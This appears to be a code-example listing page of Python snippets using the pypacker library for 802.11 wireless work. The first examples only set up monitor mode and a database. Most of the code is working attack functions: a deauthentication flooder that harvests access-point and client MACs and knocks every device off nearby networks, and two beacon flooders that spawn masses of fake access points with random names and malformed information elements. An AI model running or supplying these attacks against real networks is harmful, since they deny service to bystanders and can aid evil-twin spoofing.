Beispiel #1
0
def main(iface):
    """initiate database"""
    logger.debug("initiating database")
    engine = create_engine('sqlite:///sqla.db')
    engine.echo = False
    Base.metadata.create_all(engine)
    db_handler = DatabaseHandler(engine)
    """initiate interface"""
    initial_mode = utils.get_wlan_mode(iface)
    initial_state_up = utils.is_interface_up(iface)
    logger.debug("setting monitor mode on %s" % iface)
    utils.set_interface_mode(iface, monitor_active=True, state_active=True)

    channels = utils.get_available_wlan_channels(iface)

    if len(channels) == 0:
        # set default channels
        logger.debug("no channels found, defaulting to 1->12")
        channels = [ch for ch in range(1, 12)]

    logger.info("available channels: %r" % str(channels))
    """initiate logic"""
    packetcollector = PacketCollector(iface)
    logic = Logic(db_handler, packetcollector, channels)
    findershell = FinderShell(logic, db_handler)

    try:
        findershell.cmdloop()
    except KeyboardInterrupt:
        # don't mind if user interrupted session
        pass
    """shutdown everything"""
    logic.shutdown()

    # re-init interface with original configuration
    monitor_active = True if initial_mode == utils.MODE_MONITOR else False
    logger.debug(
        "re-enabling initial interface mode on %s, monitor=%r, active=%r" %
        (iface, monitor_active, initial_state_up))
    utils.set_interface_mode(iface,
                             monitor_active=monitor_active,
                             state_active=initial_state_up)
Beispiel #2
0
import logging
logger = logging.getLogger("pypacker")


#
# sanity checks
#
if len(sys.argv) < 2:
	print("pleace specify an interface as 1st parameter")
	sys.exit(1)

iface	= sys.argv[1]

utils.set_wlan_monmode(iface, monitor_active=True)
psock = psocket.SocketHndl(iface_name=iface, timeout=0.5)
channels = utils.get_available_wlan_channels(iface)

if len(channels) == 0:
	# set default channels
	channels = [ch for ch in range(1, 12)]
print("got som' channels: %r" % str(channels))


Base = declarative_base()


#
# data schemes
#
class Station(Base):
	__tablename__ = 'station'
Beispiel #3
0
import logging
logger = logging.getLogger("pypacker")

#
# sanity checks
#
if len(sys.argv) < 2:
    print("pleace specify an interface as 1st parameter")
    sys.exit(1)

iface = sys.argv[1]

utils.set_wlan_monmode(iface, monitor_active=True)
psock = psocket.SocketHndl(iface_name=iface, timeout=0.5)
channels = utils.get_available_wlan_channels(iface)

if len(channels) == 0:
    # set default channels
    channels = [ch for ch in range(1, 12)]
print("got som' channels: %r" % str(channels))

Base = declarative_base()


#
# data schemes
#
class Station(Base):
    __tablename__ = 'station'
Beispiel #4
0
def wifi_deauth_cb(pargs):
    """
	Deauth everyone and everything
	"""
    if pargs.channels is not None:
        channels = [int(channel) for channel in pargs.channels.split(",")]
    else:
        channels = utils.get_available_wlan_channels(pargs.iface_name)

    logger.debug("using channels: %r", channels)

    psock_rcv = psocket.SocketHndl(iface_name=pargs.iface_name,
                                   mode=psocket.SocketHndl.MODE_LAYER_2,
                                   timeout=1)
    psock_send = psocket.SocketHndl(iface_name=pargs.iface_name,
                                    mode=psocket.SocketHndl.MODE_LAYER_2)
    # {channel : {b"AP" : set(b"clients", ...)}}
    wdata = collections.defaultdict(lambda: collections.defaultdict(set))

    # thread: socket1: listen for traffic, extract ap/client macs
    def listen_cycler(pargs_ref):
        while pargs_ref.is_running:
            try:
                rtap = psock_rcv.recvp(lowest_layer=radiotap.Radiotap)[0]
            except (IndexError, socket.timeout, OSError):
                logger.debug("no packets received..")
                continue

            try:
                pkt_ieee80211 = rtap.ieee80211
            except Exception as ex:
                logger.warning(ex)
            # TODO: use channel info from radiotap?

            if pkt_ieee80211.is_beacon():
                bssid = pkt_ieee80211.beacon.bssid

                if bssid in pargs.macs_excluded:
                    #logger.debug("excluding AP: %r", bssid)
                    continue
                # don't overwrite already stored client MACs
                if bssid not in wdata[pargs.current_channel]:
                    # logger.debug("new AP: %r %s", bssid, utils.get_vendor_for_mac(bssid))
                    wdata[pargs.current_channel][bssid] = set()

            for client in pkt_ieee80211.extract_client_macs():
                bssid = pkt_ieee80211.upper_layer.bssid

                if bssid in pargs.macs_excluded:
                    #logger.debug("excluding AP: %r", bssid)
                    continue

                if client in pargs.macs_excluded or\
                  client in wdata[pargs.current_channel][bssid]:
                    #logger.debug("excluding client: %r", bssid)
                    continue
                    # logger.debug("new client: %r %s", client, utils.get_vendor_for_mac(client))
                wdata[pargs.current_channel][bssid].add(client)

    pargs.is_running = True
    pargs.current_channel = channels[0]

    layer_radiotap = radiotap.Radiotap()
    layer_iee80211 = ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE,
                                         subtype=ieee80211.M_DEAUTH)
    layer_deauth = ieee80211.IEEE80211.Deauth()
    pkt_deauth = layer_radiotap + layer_iee80211 + layer_deauth

    thread_listen = threading.Thread(target=listen_cycler, args=[pargs])
    thread_listen.start()

    logger.info("first round slow start..")

    for cnt in range(pargs.count):
        seq = 0
        layer_deauth.seq = seq

        if not pargs.is_running:
            break

        for channel in channels:
            # skip non-traffic channels
            if cnt > 0 and len(wdata[channel]) == 0:
                #logger.debug("skipping channel %d", channel)
                continue

            utils.switch_wlan_channel(pargs.iface_name, channel)
            pargs.current_channel = channel

            try:
                time.sleep(0.4 if cnt == 0 else 0.05)
            except KeyboardInterrupt:
                pargs.is_running = False
                break

            logger.info(
                "deauth on channel %3d (%3d APs, %3d clients, round %4d)",
                channel, len(wdata[channel]),
                sum(len(clients) for ap, clients in wdata[channel].items()),
                cnt)
            # TODO: quite slow
            aps = list(wdata[channel].keys())

            for mac_ap, macs_clients in [[ap, wdata[channel][ap]]
                                         for ap in aps]:
                layer_deauth.seq += 1
                layer_deauth.src = mac_ap
                layer_deauth.bssid = mac_ap

                if not pargs.nobroadcast:
                    # reset src/dst for broadcast
                    layer_deauth.dst = b"\xFF" * 6

                    # TODO: increase?
                    # logger.debug("deauth AP: %r", mac_ap)
                    for _ in range(5):
                        layer_deauth.seq += 1
                        psock_send.send(pkt_deauth.bin())

                for mac_client in list(macs_clients):
                    # logger.debug("deauth client: %r", mac_client)
                    layer_deauth.dst = mac_client

                    for _ in range(2):
                        layer_deauth.seq += 1
                        psock_send.send(pkt_deauth.bin())

    psock_send.close()
    psock_rcv.close()
Beispiel #5
0
def wifi_ap_ie_cb(pargs):
    """
	Create fake APs using various IEs
	"""
    if pargs.channels is not None:
        channels = [int(channel) for channel in pargs.channels.split(",")]
    else:
        channels = utils.get_available_wlan_channels(pargs.iface_name)

    beacon_orig = radiotap.Radiotap() + \
        ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_BEACON, to_ds=0, from_ds=0) + \
        ieee80211.IEEE80211.Beacon(
        dst=b"\xFF\xFF\xFF\xFF\xFF\xFF",
        src=b"\xFF\xFF\xFF\xFF\xFF\xFF",
        params=[ieee80211.IEEE80211.IE(id=0, len=10, body_bytes=b"\x00" * 10),
         ieee80211.IEEE80211.IE(id=1, len=8, body_bytes=b"\x82\x84\x8b\x96\x0c\x12\x18\x24"),
         ieee80211.IEEE80211.IE(id=3, len=1, body_bytes=b"\x04"),
         ieee80211.IEEE80211.IE(id=5, len=4, body_bytes=b"\x00\x01\x00\x00"),
         ieee80211.IEEE80211.IE(id=0x2A, len=1, body_bytes=b"\x00"),
         ieee80211.IEEE80211.IE(id=0x00, len=255, body_bytes=b"\x00"*16),
        ]
        )
    beacon = copy.deepcopy(beacon_orig)
    _beacon = beacon[ieee80211.IEEE80211.Beacon]
    mac = pypacker.get_rnd_mac()
    essid = "012"
    _beacon.src = mac
    _beacon.bssid = mac
    _beacon.params[0].body_bytes = bytes(essid, "ascii")
    _beacon.params[0].len = len(essid)
    _beacon.params[2].body_bytes = pack_B(channels[0])
    _beacon.seq = 0
    # adaptive sleeptime due to full buffer on fast sending
    sleeptime = 0.000001
    pargs.is_running = True

    logger.info("faking APs on the following channels %r", channels)
    psock_send = psocket.SocketHndl(iface_name=pargs.iface_name,
                                    mode=psocket.SocketHndl.MODE_LAYER_2)

    ie_cnt = 0
    pkt_cnt = 0
    PACKETS_PER_CHANNEL = 3

    for _ in range(pargs.count):
        if not pargs.is_running:
            break

        for channel in channels:
            if pkt_cnt % (256) == 0:
                print("%d packets sent, ch: %d      \r" % (pkt_cnt, channel),
                      end="")
                sys.stdout.flush()

            _beacon.params[2].body_bytes = pack_B(channel)
            utils.switch_wlan_channel(pargs.iface_name, channel)
            #logger.info("AP on channel %d: %s", channel, _beacon.params[0].body_bytes)
            pkt_cnt += 256

            try:
                for ie_id in range(256):
                    _beacon.params[5].id = ie_id
                    mac = pypacker.get_rnd_mac()
                    _beacon.src = mac
                    _beacon.bssid = mac
                    _beacon.params[0].body_bytes = get_random_essid()
                    _beacon.params[0].len = len(_beacon.params[0].body_bytes)

                    for _ in range(PACKETS_PER_CHANNEL):
                        _beacon.seq = ie_id
                        # _beacon.ts = x << (8*7)
                        _beacon.ts = ie_id * 20
                        # time.sleep(0.01)
                        psock_send.send(beacon.bin())
                        time.sleep(sleeptime)
            except socket.timeout:
                # timeout on sending? that's ok
                pass
            except OSError:
                sleeptime *= 10
                print()
                logger.warning(
                    "buffer full, new sleeptime: %03.6fs, waiting...",
                    sleeptime)
                time.sleep(1)

            ie_cnt = (ie_cnt + 1) & 0xFF
    psock_send.close()
Beispiel #6
0
def wifi_ap_cb(pargs):
    """
	Create a massive amount of fake APs
	"""
    if pargs.channels is not None:
        channels = [int(channel) for channel in pargs.channels.split(",")]
    else:
        channels = utils.get_available_wlan_channels(pargs.iface_name)

    beacon_orig = radiotap.Radiotap() + \
        ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_BEACON, to_ds=0, from_ds=0) + \
        ieee80211.IEEE80211.Beacon(
        dst=b"\xFF\xFF\xFF\xFF\xFF\xFF",
        src=b"\xFF\xFF\xFF\xFF\xFF\xFF",
        params=[ieee80211.IEEE80211.IE(id=0, len=10, body_bytes=b"\x00" * 10),
         ieee80211.IEEE80211.IE(id=1, len=8, body_bytes=b"\x82\x84\x8b\x96\x0c\x12\x18\x24"),
         ieee80211.IEEE80211.IE(id=3, len=1, body_bytes=b"\x04"),
         ieee80211.IEEE80211.IE(id=5, len=4, body_bytes=b"\x00\x01\x00\x00"),
         ieee80211.IEEE80211.IE(id=0x2A, len=1, body_bytes=b"\x00")])
    beacon = copy.deepcopy(beacon_orig)
    _beacon = beacon[ieee80211.IEEE80211.Beacon]
    mac = pypacker.get_rnd_mac()
    essid = "FreeHotspot"
    _beacon.src = mac
    _beacon.bssid = mac
    _beacon.params[0].body_bytes = bytes(essid, "ascii")
    _beacon.params[0].len = len(essid)
    _beacon.params[2].body_bytes = pack_B(channels[0])
    _beacon.seq = 0
    _beacon.interval = 0xFFFF
    # adaptive sleeptime due to full buffer on fast sending
    sleeptime = 0.000001
    rand_mac = True
    rand_essid = True
    pargs.is_running = True

    logger.info("faking APs on the following channels %r", channels)
    psock_send = psocket.SocketHndl(iface_name=pargs.iface_name,
                                    mode=psocket.SocketHndl.MODE_LAYER_2)
    cnt = 0
    rounds = 0
    PACKETS_PER_CHANNEL = 3
    starttime = time.time()
    _beacon.params[2].body_bytes = pack_B(channels[0])
    utils.switch_wlan_channel(pargs.iface_name, channels[0])

    for _ in range(pargs.count):
        if not pargs.is_running:
            break

        if cnt & 0xF == 0:
            print("%d packets sent\r" % (cnt * PACKETS_PER_CHANNEL), end="")
            sys.stdout.flush()

            if time.time() - starttime > 60:
                rounds += 1
                cnt = 0

        cnt_bts = unpack_I(cnt)[0][-3:]
        cnt += 1

        if rand_mac:
            mac = pypacker.get_rnd_mac()[:3] + cnt_bts
            _beacon.src = mac
            _beacon.bssid = mac

        if rand_essid:
            _beacon.params[0].body_bytes = get_random_essid()[:-3] + cnt_bts
            _beacon.params[0].len = len(_beacon.params[0].body_bytes)

        try:
            _beacon.seq = 1000 + rounds * PACKETS_PER_CHANNEL
            _beacon.ts = 2000 + rounds * 0x100 * PACKETS_PER_CHANNEL

            for cnt_ap in range(PACKETS_PER_CHANNEL):
                # send multiple beacons for every ap
                psock_send.send(beacon.bin())
                _beacon.seq += 1
                _beacon.ts += 0x100
                #time.sleep(sleeptime)
        except socket.timeout:
            # timeout on sending? that's ok
            pass
        except OSError:
            sleeptime *= 10
            print()
            logger.warning("buffer full, new sleeptime: %03.6fs, waiting...",
                           sleeptime)
            time.sleep(1)

    psock_send.close()